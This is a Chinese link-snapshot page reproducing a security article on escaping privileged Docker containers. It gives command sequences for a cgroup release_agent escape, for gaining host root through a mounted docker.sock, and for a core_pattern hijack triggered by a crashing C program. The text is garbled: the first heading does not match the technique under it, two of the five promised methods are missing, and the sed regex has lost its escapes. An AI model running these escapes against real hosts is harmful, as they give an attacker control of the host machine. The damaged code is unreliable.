添加链接 注册    登录
link管理
链接快照平台
  • 输入网页链接,自动生成快照
  • 标签化管理网页链接
相关文章推荐
不拘小节的单车  ·  宁波赫威斯肯特学校百科_学费_地址_学校·  5 月前    · 
刚失恋的炒面  ·  平成28年度「古殿町フォトコンテスト」入賞作 ...·  5 月前    · 
难过的盒饭  ·  minio服务器上文件访问不了_minio ...·  1 年前    · 
爱看书的核桃  ·  在Python中访问pandas ...·  1 年前    · 
帅呆的苦咖啡  ·  灌篮高手电影版百度网盘资源在线观看日语中字「 ...·  1 年前    · 
link管理  ›  五种方式教你用特权容器逃逸 | CN-SEC 中文网
docker 容器 cgroup
https://cn-sec.com/archives/544048.html
飞奔的蚂蚁
1 年前
随着容器被广泛的使用,容器安全问题也越来越受重视,容器逃逸便是其中一项。容器逃逸可以理解为当攻击者通过某种手段获取到容器内权限后利用某些条件来创造条件,以获得容器所在宿主机的权限,也可以说是提权了。这次简单说几个个特权容器的逃逸手法。
关于特权容器的逃逸相对来说比较容易一些,毕竟它自身已经被赋予了最大的权限。 般可能第一点想到的就是挂载主机的/etc目录来写定时任务或者是挂载/root/.ssh写ssh密钥。

方式一:挂载/etc逃逸

因为/etc目录中包含crontab的配置文件,此文件目录为/etc/crontab。挂载了宿主机的/etc到容器内,在容器内修改crontab文件,宿主机上的crontab文件也同样会修改。话不多说,直接上图。

首先启动一个容器 

docker run --rm -it --privileged ubuntu bash

在容器里执行命令,将cgroup直接以 cgroup类型挂载到容器内,挂载选项为 rdma(远程直接内存访问)并在容器内创建一个子cgroup目录(cgroup_2),目的是为了创建release_agent文件且触发release_agent执行的cgroup。 

mkdir /tmp/cgroup
mount -t cgroup -o rdma cgroup /tmp/cgroup 
mkdir /tmp/cgroup/cgroup_2

激活子cgroup的notify_on_release,使得在子cgroup退出时能够执行其父cgroup中的release_agent,当将 notify_on_release被设置为1时,在子cgroup被移除时,内核将会运行顶层cgroup下的release_agent文件中指定的命令。 

echo 1 > /tmp/cgroup/cgroup_2/notify_on_release

通过读取/etc/mtab获取uppdir= 后面跟随的路径(宿主机访问容器的路径),并将其并写入 release_agent(如下图所示),宿主机可通过该路径访问容器根目录,cgroup最后一个程序退出时执行/cmd的脚本。 

host_path=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgroup/release_agent

接下来就是构造cmd脚本,并将结果输出到容器内output下 

echo '#!/bin/sh' > /cmd
echo "ps ef > $host_path/output" >> /cmd 
chmod a+x /cmd

通过子cgroup创建一个可以立即结束的进程,实施攻击,如图,成功获得主机ps结果 

sh -c "echo $$ > /tmp/cgroup/cgroup_2/cgroup.procs"

方式四:挂载docker.sock实现逃逸

当宿主机的docker.sock被挂载到容器内时,此容器可以通过docker.sock控制宿主机创建任意配置容器和控制正在运行的容器 

 docker -H unix:///hack/docker.sock info  #通过此命令可以查看docker信息
docker -H unix:///hack/docker.sock run -it  --rm -v /:/test --name=docker_sock_taoyi2 centos  /bin/bash  #通过docker创建一个挂载宿主机根目录的容器

创建成功。

方式五:挂载/proc目录实现逃逸

1、与cgroup相同,通过读取/etc/mtab获取uppdir= 后面跟随的路径。 

sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab

2、此时容器内的 /exp.sh 对应宿主机/var/lib/docker/overlay2/5aad6c46857541101a54c64b8e92ac8495e4eecb6bbd6a76e24a0335be8d2d92/diff/exp.sh 文件。

3、挂载之后的文件,相当于共享。容器内外修改都会对应产生变化 

echo -e "|/var/lib/docker/overlay2/5aad6c46857541101a54c64b8e92ac8495e4eecb6bbd6a76e24a0335be8d2d92/diff/exp.sh rcore " > /host_proc/sys/kernel/core_pattern

4、容器内 触发 segmentation fault 

#include <stdio.h>

int main(void){
int *a = NULL;
*a = 1;
return 0;
}
./a.out

由于篇幅有限,此次只介绍了五种常见的特权容器逃逸思路。除此之外,特权容器或是容器逃逸的方式还有很多种,后续再一 一详述。

 
推荐文章
不拘小节的单车  ·  宁波赫威斯肯特学校百科_学费_地址_学校
5 月前
刚失恋的炒面  ·  平成28年度「古殿町フォトコンテスト」入賞作品が決定しました | イベント | ニュース・トピックス | 古殿町
5 月前
难过的盒饭  ·  minio服务器上文件访问不了_minio 分享链接公网无法访问-CSDN博客
1 年前
爱看书的核桃  ·  在Python中访问pandas DataFrame中最后一个元素的索引
1 年前
帅呆的苦咖啡  ·  灌篮高手电影版百度网盘资源在线观看日语中字「BD720P/3.9G-MP4」未删减完整版【4k高清蓝光下载】 - 真题笔记
1 年前
Link管理   ·   51好读   ·   Sov5搜索   ·   小百科
link管理 - 链接快照平台